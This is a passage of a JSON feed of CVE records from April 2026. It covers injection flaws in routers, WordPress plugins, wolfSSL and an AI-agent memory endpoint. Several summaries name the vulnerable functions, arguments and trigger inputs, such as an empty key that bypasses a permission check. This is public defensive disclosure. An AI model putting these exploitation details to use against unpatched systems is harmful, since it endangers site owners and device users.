/delete-category.php. Performing a manipulation of the argument cat_id results in sql injection. It is possible to initiate the attack remotely. The exploit is now public and may be used.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0003,"ranking_epss":0.08446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/zulu225588/zulu-loudong/issues/1","https://vuldb.com/submit/794333","https://vuldb.com/vuln/356560","https://vuldb.com/vuln/356560/cti"],"published_time":"2026-04-10T03:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33551","summary":"An issue was discovered in OpenStack Keystone 14 through 26 before 26.1.1, 27.0.0, 28.0.0, and 29.0.0. Restricted application credentials can create EC2 credentials. By using a restricted application credential to call the EC2 credential creation API, an authenticated user with only a reader role may obtain an EC2/S3 credential that carries the full set of the parent user's S3 permissions, effectively bypassing the role restrictions imposed on the application credential. Only deployments that use restricted application credentials in combination with the EC2/S3 compatibility API (swift3 / s3api) are affected.","cvss":3.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":3.5,"cvss_v4":null,"epss":0.0002,"ranking_epss":0.05422,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://bugs.launchpad.net/keystone/+bug/2142138","https://security.openstack.org/ossa/OSSA-2026-005.html","http://www.openwall.com/lists/oss-security/2026/04/07/12","https://bugs.launchpad.net/keystone/+bug/2142138"],"published_time":"2026-04-10T03:16:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5996","summary":"A security vulnerability has been detected in Totolink A7100RU 7.4cu.2313_b20191024. The affected element is the function setAdvancedInfoShow of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument tty_server leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used.","cvss":8.9,"cvss_version":4.0,"cvss_v2":10.0,"cvss_v3":9.8,"cvss_v4":8.9,"epss":0.00892,"ranking_epss":0.75567,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_168/README.md","https://vuldb.com/submit/792044","https://vuldb.com/vuln/356550","https://vuldb.com/vuln/356550/cti","https://www.totolink.net/"],"published_time":"2026-04-10T02:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5997","summary":"A vulnerability was detected in Totolink A7100RU 7.4cu.2313_b20191024. The impacted element is the function setLoginPasswordCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument admpass results in os command injection. It is possible to launch the attack remotely. The exploit is now public and may be used.","cvss":8.9,"cvss_version":4.0,"cvss_v2":10.0,"cvss_v3":9.8,"cvss_v4":8.9,"epss":0.00892,"ranking_epss":0.75567,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_169/README.md","https://vuldb.com/submit/792045","https://vuldb.com/vuln/356551","https://vuldb.com/vuln/356551/cti","https://www.totolink.net/"],"published_time":"2026-04-10T02:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5998","summary":"A flaw has been found in zhayujie chatgpt-on-wechat CowAgent up to 2.0.4. This affects the function dispatch of the file agent/memory/service.py of the component API Memory Content Endpoint. This manipulation of the argument filename causes path traversal. The attack can be initiated remotely. The exploit has been published and may be used. Upgrading to version 2.0.5 mitigates this issue. Patch name: 174ee0cafc9e8e9d97a23c305418251485b8aa89. It is recommended to upgrade the affected component. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product.","cvss":5.5,"cvss_version":4.0,"cvss_v2":5.0,"cvss_v3":5.3,"cvss_v4":5.5,"epss":0.00048,"ranking_epss":0.14831,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/zhayujie/chatgpt-on-wechat/commit/174ee0cafc9e8e9d97a23c305418251485b8aa89","https://github.com/zhayujie/chatgpt-on-wechat/issues/2734","https://github.com/zhayujie/chatgpt-on-wechat/issues/2734#issue-4178013778","https://github.com/zhayujie/chatgpt-on-wechat/releases/tag/2.0.5","https://vuldb.com/submit/793558","https://vuldb.com/vuln/356552","https://vuldb.com/vuln/356552/cti"],"published_time":"2026-04-10T02:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-3360","summary":"The Tutor LMS – eLearning and online course solution plugin for WordPress is vulnerable to an Insecure Direct Object Reference in all versions up to, and including, 3.9.7. This is due to missing authentication and authorization checks in the `pay_incomplete_order()` function. The function accepts an attacker-controlled `order_id` parameter and uses it to look up order data, then writes billing fields to the order owner's profile (`$order_data->user_id`) without verifying the requester's identity or ownership. Because the Tutor nonce (`_tutor_nonce`) is exposed on public frontend pages, this makes it possible for unauthenticated attackers to overwrite the billing profile (name, email, phone, address) of any user who has an incomplete manual order, by sending a crafted POST request with a guessed or enumerated `order_id`.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.00102,"ranking_epss":0.27911,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Tutor.php#L563","https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/ecommerce/CheckoutController.php#L1059","https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/ecommerce/CheckoutController.php#L108","https://plugins.trac.wordpress.org/browser/tutor/trunk/ecommerce/CheckoutController.php#L1059","https://plugins.trac.wordpress.org/changeset/3496394/tutor/trunk/ecommerce/CheckoutController.php","https://www.wordfence.com/threat-intel/vulnerabilities/id/7f365519-dd0a-4f39-880d-7216ce2f7d1e?source=cve"],"published_time":"2026-04-10T02:16:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4057","summary":"The Download Manager plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the `makeMediaPublic()` and `makeMediaPrivate()` functions in all versions up to, and including, 3.3.51. This is due to the functions only checking for `edit_posts` capability without verifying post ownership via `current_user_can('edit_post', $id)`, and the destructive operations executing before the admin-level check in `mediaAccessControl()`. This makes it possible for authenticated attackers, with Contributor-level access and above, to strip all protection metadata (password, access restrictions, private flag) from any media file they do not own, making admin-protected files publicly accessible via their direct URL.","cvss":4.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":null,"epss":0.00031,"ranking_epss":0.0893,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/download-manager/tags/3.3.51/src/MediaLibrary/MediaAccessControl.php#L237","https://plugins.trac.wordpress.org/browser/download-manager/tags/3.3.51/src/MediaLibrary/MediaAccessControl.php#L257","https://plugins.trac.wordpress.org/browser/download-manager/trunk/src/MediaLibrary/MediaAccessControl.php#L237","https://plugins.trac.wordpress.org/browser/download-manager/trunk/src/MediaLibrary/MediaAccessControl.php#L257","https://plugins.trac.wordpress.org/changeset/3492316/download-manager/trunk/src/MediaLibrary/MediaAccessControl.php","https://plugins.trac.wordpress.org/changeset?old_path=%2Fdownload-manager/tags/3.3.51&new_path=%2Fdownload-manager/tags/3.3.52","https://www.wordfence.com/threat-intel/vulnerabilities/id/a6b02846-61be-4571-921d-53df5493f856?source=cve"],"published_time":"2026-04-10T02:16:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4305","summary":"The Royal WordPress Backup & Restore Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'wpr_pending_template' parameter in all versions up to, and including, 1.0.16 due to insufficient input validation. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick an administrator into performing an action such as clicking on a link.","cvss":6.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.1,"cvss_v4":null,"epss":0.00033,"ranking_epss":0.09364,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/royal-backup-reset/tags/1.0.16/assets/backup-reminder.js#L751","https://plugins.trac.wordpress.org/browser/royal-backup-reset/tags/1.0.16/royal-backup-reset.php#L803","https://plugins.trac.wordpress.org/changeset?old_path=%2Froyal-backup-reset/tags/1.0.16&new_path=%2Froyal-backup-reset/tags/1.0.17","https://www.wordfence.com/threat-intel/vulnerabilities/id/f9e0c658-b37c-4780-9589-6def9e36539b?source=cve"],"published_time":"2026-04-10T02:16:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4351","summary":"The Perfmatters plugin for WordPress is vulnerable to arbitrary file overwrite via path traversal in all versions up to, and including, 2.5.9. This is due to the `PMCS::action_handler()` method processing the bulk action `activate`/`deactivate` handlers without any authorization check or nonce verification. The `$_GET['snippets'][]` values are passed unsanitized to `Snippet::activate()`/`Snippet::deactivate()` which call `Snippet::update()` then `file_put_contents()` with the traversed path. This makes it possible for authenticated attackers, with Subscriber-level access and above, to overwrite arbitrary files on the server with a fixed PHP docblock content, potentially causing denial of service by corrupting critical files like `.htaccess` or `index.php`.","cvss":8.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.1,"cvss_v4":null,"epss":0.00055,"ranking_epss":0.17084,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://perfmatters.io/docs/changelog/","https://www.wordfence.com/threat-intel/vulnerabilities/id/c172ab2b-ce1f-4a0d-b31f-b75ff2f03506?source=cve"],"published_time":"2026-04-10T02:16:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4664","summary":"The Customer Reviews for WooCommerce plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 5.103.0. This is due to the `create_review_permissions_check()` function comparing the user-supplied `key` parameter against the order's `ivole_secret_key` meta value using strict equality (`===`), without verifying that the stored key is non-empty. For orders where no review reminder email has been sent, the `ivole_secret_key` meta is not set, causing `get_meta()` to return an empty string. An attacker can supply `key: \"\"` to match this empty value and bypass the permission check. This makes it possible for unauthenticated attackers to submit, modify, and inject product reviews on any product — including products not associated with the referenced order — via the REST API endpoint `POST /ivole/v1/review`. Reviews are auto-approved by default since `ivole_enable_moderation` defaults to `\"no\"`.","cvss":5.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.3,"cvss_v4":null,"epss":0.00147,"ranking_epss":0.35038,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/customer-reviews-woocommerce/tags/5.102.0/includes/emails/class-cr-email.php#L345","https://plugins.trac.wordpress.org/browser/customer-reviews-woocommerce/tags/5.102.0/includes/reviews/class-cr-endpoint.php#L646","https://plugins.trac.wordpress.org/browser/customer-reviews-woocommerce/tags/5.102.0/includes/reviews/class-cr-endpoint.php#L654","https://plugins.trac.wordpress.org/browser/customer-reviews-woocommerce/tags/5.102.0/includes/reviews/class-cr-endpoint.php#L655","https://plugins.trac.wordpress.org/changeset?old_path=%2Fcustomer-reviews-woocommerce/tags/5.103.0&new_path=%2Fcustomer-reviews-woocommerce/tags/5.104.0","https://wordpress.org/plugins/customer-reviews-woocommerce/","https://www.wordfence.com/threat-intel/vulnerabilities/id/27e3dfe3-ad33-4d0c-a999-d0734df2f59b?source=cve"],"published_time":"2026-04-10T02:16:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4977","summary":"The UsersWP – Front-end login form, User Registration, User Profile & Members Directory plugin for WordPress is vulnerable to Improper Access Control in all versions up to, and including, 1.2.58 This is due to insufficient field-level permission validation in the upload_file_remove() AJAX handler where the $htmlvar parameter is not validated against a whitelist of allowed fields or checked against the field's for_admin_use property. This makes it possible for authenticated attackers, with subscriber-level access and above, to clear or reset any restricted usermeta column for their own user record, including fields marked as \"For admin use only\", bypassing intended field-level access restrictions.","cvss":4.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":null,"epss":0.00031,"ranking_epss":0.0868,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/userswp/tags/1.2.54/includes/class-forms.php#L2251","https://plugins.trac.wordpress.org/browser/userswp/tags/1.2.54/includes/class-forms.php#L2274","https://plugins.trac.wordpress.org/browser/userswp/tags/1.2.54/includes/class-meta.php#L165","https://plugins.trac.wordpress.org/browser/userswp/trunk/includes/class-forms.php#L2251","https://plugins.trac.wordpress.org/browser/userswp/trunk/includes/class-forms.php#L2274","https://plugins.trac.wordpress.org/browser/userswp/trunk/includes/class-meta.php#L165","https://plugins.trac.wordpress.org/changeset?old_path=%2Fuserswp/tags/1.2.58&new_path=%2Fuserswp/tags/1.2.59","https://www.wordfence.com/threat-intel/vulnerabilities/id/efee685c-e2cd-471b-aea9-607124df6006?source=cve"],"published_time":"2026-04-10T02:16:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-1263","summary":"The Webling plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 3.9.0 due to insufficient input sanitization, insufficient output escaping, and missing capabilities checks in the 'webling_admin_save_form' and 'webling_admin_save_memberlist' functions. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject Webling forms and memberlists with arbitrary web scripts that will execute whenever an administrator views the related form or memberlist area of the WordPress admin.","cvss":6.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.4,"cvss_v4":null,"epss":0.00036,"ranking_epss":0.10551,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/webling/tags/3.9.0/src/admin/actions/save_form.php#L2","https://plugins.trac.wordpress.org/browser/webling/tags/3.9.0/src/admin/actions/save_memberlist.php#L2","https://plugins.trac.wordpress.org/browser/webling/tags/3.9.0/src/admin/lists/Form_List.php#L122","https://plugins.trac.wordpress.org/browser/webling/tags/3.9.0/src/admin/lists/Memberlist_List.php#L115","https://plugins.trac.wordpress.org/changeset?old_path=%2Fwebling/tags/3.9.0&new_path=%2Fwebling/tags/3.9.1","https://www.wordfence.com/threat-intel/vulnerabilities/id/bd8fbe0d-0709-4fa2-9294-393ddcd05b22?source=cve"],"published_time":"2026-04-10T02:16:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-1924","summary":"The Aruba HiSpeed Cache plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.0.4. This is due to missing nonce verification on the `ahsc_ajax_reset_options()` function. This makes it possible for unauthenticated attackers to reset all plugin settings to their default values via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","cvss":4.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":null,"epss":0.00017,"ranking_epss":0.03842,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/aruba-hispeed-cache/tags/3.0.4/aruba-hispeed-cache.php#L631","https://plugins.trac.wordpress.org/browser/aruba-hispeed-cache/tags/3.0.4/aruba-hispeed-cache.php#L632","https://plugins.trac.wordpress.org/changeset?old_path=%2Faruba-hispeed-cache/tags/3.0.4&new_path=%2Faruba-hispeed-cache/tags/3.0.5","https://www.wordfence.com/threat-intel/vulnerabilities/id/d2230151-fde2-43d6-8bff-0d2ffd559ab3?source=cve"],"published_time":"2026-04-10T02:16:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-25203","summary":"Samsung MagicINFO 9 Server Incorrect Default Permissions Local Privilege Escalation Vulnerability\n\n\nThis issue affects MagicINFO 9 Server: less than 21.1091.1.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":0.0001,"ranking_epss":0.01035,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://security.samsungtv.com/securityUpdates"],"published_time":"2026-04-10T02:16:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-2712","summary":"The WP-Optimize plugin for WordPress is vulnerable to unauthorized access of functionality due to missing capability checks in the `receive_heartbeat()` function in `includes/class-wp-optimize-heartbeat.php` in all versions up to, and including, 4.5.0. This is due to the Heartbeat handler directly invoking `Updraft_Smush_Manager_Commands` methods without verifying user capabilities, nonce tokens, or the allowed commands whitelist that the normal AJAX handler (`updraft_smush_ajax`) enforces. This makes it possible for authenticated attackers, with Subscriber-level access and above, to invoke admin-only Smush operations including reading log files (`get_smush_logs`), deleting all backup images (`clean_all_backup_images`), triggering bulk image processing (`process_bulk_smush`), and modifying Smush options (`update_smush_options`).","cvss":5.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.4,"cvss_v4":null,"epss":0.00038,"ranking_epss":0.11334,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/wp-optimize/tags/4.4.1/includes/class-wp-optimize-heartbeat.php#L65","https://plugins.trac.wordpress.org/browser/wp-optimize/tags/4.4.1/includes/class-wp-optimize-heartbeat.php#L82","https://plugins.trac.wordpress.org/browser/wp-optimize/trunk/includes/class-wp-optimize-heartbeat.php#L65","https://research.cleantalk.org/cve-2026-2712/","https://www.wordfence.com/threat-intel/vulnerabilities/id/6a0a376e-ea3a-40ca-9341-f28f92e15e02?source=cve"],"published_time":"2026-04-10T02:16:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5994","summary":"A security flaw has been discovered in Totolink A7100RU 7.4cu.2313_b20191024. This issue affects the function setTelnetCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Performing a manipulation of the argument telnet_enabled results in os command injection. The attack is possible to be carried out remotely. The exploit has been released to the public and may be used for attacks.","cvss":8.9,"cvss_version":4.0,"cvss_v2":10.0,"cvss_v3":9.8,"cvss_v4":8.9,"epss":0.00892,"ranking_epss":0.75567,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_166/README.md","https://vuldb.com/submit/792042","https://vuldb.com/vuln/356548","https://vuldb.com/vuln/356548/cti","https://www.totolink.net/"],"published_time":"2026-04-10T01:16:42","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5995","summary":"A weakness has been identified in Totolink A7100RU 7.4cu.2313_b20191024. Impacted is the function setMiniuiHomeInfoShow of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Executing a manipulation of the argument lan_info can lead to os command injection. The attack may be performed from remote. The exploit has been made available to the public and could be used for attacks.","cvss":8.9,"cvss_version":4.0,"cvss_v2":10.0,"cvss_v3":9.8,"cvss_v4":8.9,"epss":0.00892,"ranking_epss":0.75567,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_167/README.md","https://vuldb.com/submit/792043","https://vuldb.com/vuln/356549","https://vuldb.com/vuln/356549/cti","https://www.totolink.net/"],"published_time":"2026-04-10T01:16:42","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5993","summary":"A vulnerability was identified in Totolink A7100RU 7.4cu.2313_b20191024. This vulnerability affects the function setWiFiGuestCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Such manipulation of the argument wifiOff leads to os command injection. The attack can be executed remotely. The exploit is publicly available and might be used.","cvss":8.9,"cvss_version":4.0,"cvss_v2":10.0,"cvss_v3":9.8,"cvss_v4":8.9,"epss":0.00892,"ranking_epss":0.75567,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_165/README.md","https://vuldb.com/submit/792041","https://vuldb.com/vuln/356547","https://vuldb.com/vuln/356547/cti","https://www.totolink.net/"],"published_time":"2026-04-10T01:16:41","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5460","summary":"A heap use-after-free exists in wolfSSL's TLS 1.3 post-quantum cryptography (PQC) hybrid KeyShare processing. In the error handling path of TLSX_KeyShare_ProcessPqcHybridClient() in src/tls.c, the inner function TLSX_KeyShare_ProcessPqcClient_ex() frees a KyberKey object upon encountering an error. The caller then invokes TLSX_KeyShare_FreeAll(), which attempts to call ForceZero() on the already-freed KyberKey, resulting in writes of zero bytes over freed heap memory.","cvss":6.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.3,"epss":0.00042,"ranking_epss":0.12712,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/wolfssl/wolfssl/pull/10092"],"published_time":"2026-04-10T00:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5989","summary":"A flaw has been found in Tenda F451 1.0.0.7. Affected is the function fromRouteStatic of the file /goform/RouteStatic. Executing a manipulation of the argument page can lead to stack-based buffer overflow. The attack can be launched remotely. The exploit has been published and may be used.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00046,"ranking_epss":0.14172,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Jimi-Lab/cve/issues/5","https://vuldb.com/submit/792858","https://vuldb.com/vuln/356543","https://vuldb.com/vuln/356543/cti","https://www.tenda.com.cn/"],"published_time":"2026-04-10T00:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5990","summary":"A vulnerability has been found in Tenda F451 1.0.0.7. Affected by this vulnerability is the function fromSafeEmailFilter of the file /goform/SafeEmailFilter. The manipulation of the argument page leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00046,"ranking_epss":0.14172,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Jimi-Lab/cve/issues/8","https://vuldb.com/submit/792861","https://vuldb.com/vuln/356544","https://vuldb.com/vuln/356544/cti","https://www.tenda.com.cn/"],"published_time":"2026-04-10T00:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5991","summary":"A vulnerability was found in Tenda F451 1.0.0.7. Affected by this issue is the function formWrlExtraSet of the file /goform/WrlExtraSet. The manipulation of the argument GO results in stack-based buffer overflow. The attack may be launched remotely. The exploit has been made public and could be used.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00046,"ranking_epss":0.14172,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Jimi-Lab/cve/issues/9","https://vuldb.com/submit/792862","https://vuldb.com/vuln/356545","https://vuldb.com/vuln/356545/cti","https://www.tenda.com.cn/"],"published_time":"2026-04-10T00:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5992","summary":"A vulnerability was determined in Tenda F451 1.0.0.7. This affects the function fromP2pListFilter of the file /goform/P2pListFilter. This manipulation of the argument page causes stack-based buffer overflow. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00046,"ranking_epss":0.14172,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Jimi-Lab/cve/issues/10","https://vuldb.com/submit/792863","https://vuldb.com/vuln/356546","https://vuldb.com/vuln/356546/cti","https://www.tenda.com.cn/"],"published_time":"2026-04-10T00:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5392","summary":"Heap out-of-bounds read in PKCS7 parsing. A crafted PKCS7 message can trigger an OOB read on the heap. The missing bounds check is in the indefinite-length end-of-content verification loop in PKCS7_VerifySignedData().","cvss":2.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":2.3,"epss":0.00014,"ranking_epss":0.02478,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/wolfssl/wolfssl/pull/10039"],"published_time":"2026-04-10T00:16:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5393","summary":"Dual-Algorithm CertificateVerify out-of-bounds read. When processing a dual-algorithm CertificateVerify message, an out-of-bounds read can occur on crafted input. This can only occur when --enable-experimental and --enable-dual-alg-certs is used when building wolfSSL.","cvss":6.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.3,"epss":0.00033,"ranking_epss":0.0931,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/wolfSSL/wolfssl/pull/10079"],"published_time":"2026-04-10T00:16:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5448","summary":"X.509 date buffer overflow in wolfSSL_X509_notAfter / wolfSSL_X509_notBefore. A buffer overflow may occur when parsing date fields from a crafted X.509 certificate via the compatibility layer API. This is only triggered when calling these two APIs directly from an application, and does not affect TLS or certificate verify operations in wolfSSL.","cvss":2.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":2.3,"epss":0.00015,"ranking_epss":0.02783,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/wolfSSL/wolfssl/pull/10071"],"published_time":"2026-04-10T00:16:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5987","summary":"A security vulnerability has been detected in Sanluan PublicCMS up to 6.202506.d. This affects the function AbstractFreemarkerView.doRender of the file publiccms-parent/publiccms-core/src/main/java/com/publiccms/common/base/AbstractFreemarkerView.java of the component FreeMarker Template Handler. Such manipulation leads to improper neutralization of special elements used in a template engine. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet.","cvss":5.1,"cvss_version":4.0,"cvss_v2":5.8,"cvss_v3":4.7,"cvss_v4":5.1,"epss":0.00043,"ranking_epss":0.12891,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/sanluan/PublicCMS/","https://github.com/sanluan/PublicCMS/issues/113","https://vuldb.com/submit/792385","https://vuldb.com/vuln/356541","https://vuldb.com/vuln/356541/cti"],"published_time":"2026-04-09T23:17:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5988","summary":"A vulnerability was detected in Tenda F451 1.0.0.7. This impacts the function formWrlsafeset of the file /goform/AdvSetWrlsafeset. Performing a manipulation of the argument mit_ssid results in stack-based buffer overflow. The attack can be initiated remotely. The exploit is now public and may be used.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00046,"ranking_epss":0.14172,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Jimi-Lab/cve/issues/4","https://vuldb.com/submit/792857","https://vuldb.com/vuln/356542","https://vuldb.com/vuln/356542/cti","https://www.tenda.com.cn/"],"published_time":"2026-04-09T23:17:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5295","summary":"A stack buffer overflow exists in wolfSSL's PKCS7 implementation in the wc_PKCS7_DecryptOri() function in wolfcrypt/src/pkcs7.c. When processing a CMS EnvelopedData message containing an OtherRecipientInfo (ORI) recipient, the function copies an ASN.1-parsed OID into a fixed 32-byte stack buffer (oriOID[MAX_OID_SZ]) via XMEMCPY without first validating that the parsed OID length does not exceed MAX_OID_SZ. A crafted CMS EnvelopedData message with an ORI recipient containing an OID longer than 32 bytes triggers a stack buffer overflow. Exploitation requires the library to be built with --enable-pkcs7 (disabled by default) and the application to have registered an ORI decrypt callback via wc_PKCS7_SetOriDecryptCb().","cvss":5.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":5.9,"epss":0.00016,"ranking_epss":0.03706,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/wolfSSL/wolfssl/pull/10116"],"published_time":"2026-04-09T23:17:01","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5503","summary":"In TLSX_EchChangeSNI, the ctx->extensions branch set extensions unconditionally even when TLSX_Find returned NULL. This caused TLSX_UseSNI to attach the attacker-controlled publicName to the shared WOLFSSL_CTX when no inner SNI was configured. TLSX_EchRestoreSNI then failed to clean it up because its removal was gated on serverNameX != NULL. The inner ClientHello was sized before the pollution but written after it, causing TLSX_SNI_Write to memcpy 255 bytes past the allocation boundary.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.9,"epss":0.00042,"ranking_epss":0.12712,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/wolfSSL/wolfssl/pull/10102"],"published_time":"2026-04-09T23:17:01","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5504","summary":"A padding oracle exists in wolfSSL's PKCS7 CBC decryption that could allow an attacker to recover plaintext through repeated decryption queries with modified ciphertext. In previous versions of wolfSSL the interior padding bytes are not validated.","cvss":6.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.3,"epss":0.00019,"ranking_epss":0.0495,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/wolfSSL/wolfssl/pull/10088"],"published_time":"2026-04-09T23:17:01","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5507","summary":"When restoring a session from cache, a pointer from the serialized session data is used in a free operation without validation. An attacker who can poison the session cache could trigger an arbitrary free. Exploitation requires the ability to inject a crafted session into the cache and for the application to call specific session restore APIs.","cvss":4.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":4.1,"epss":0.00016,"ranking_epss":0.03636,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/wolfSSL/wolfssl/pull/10088"],"published_time":"2026-04-09T23:17:01","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5985","summary":"A security flaw has been discovered in code-projects Simple IT Discussion Forum 1.0. The affected element is an unknown function of the file /crud.php. The manipulation of the argument user_Id results in sql injection. The attack may be performed from remote. The exploit has been released to the public and may be used for 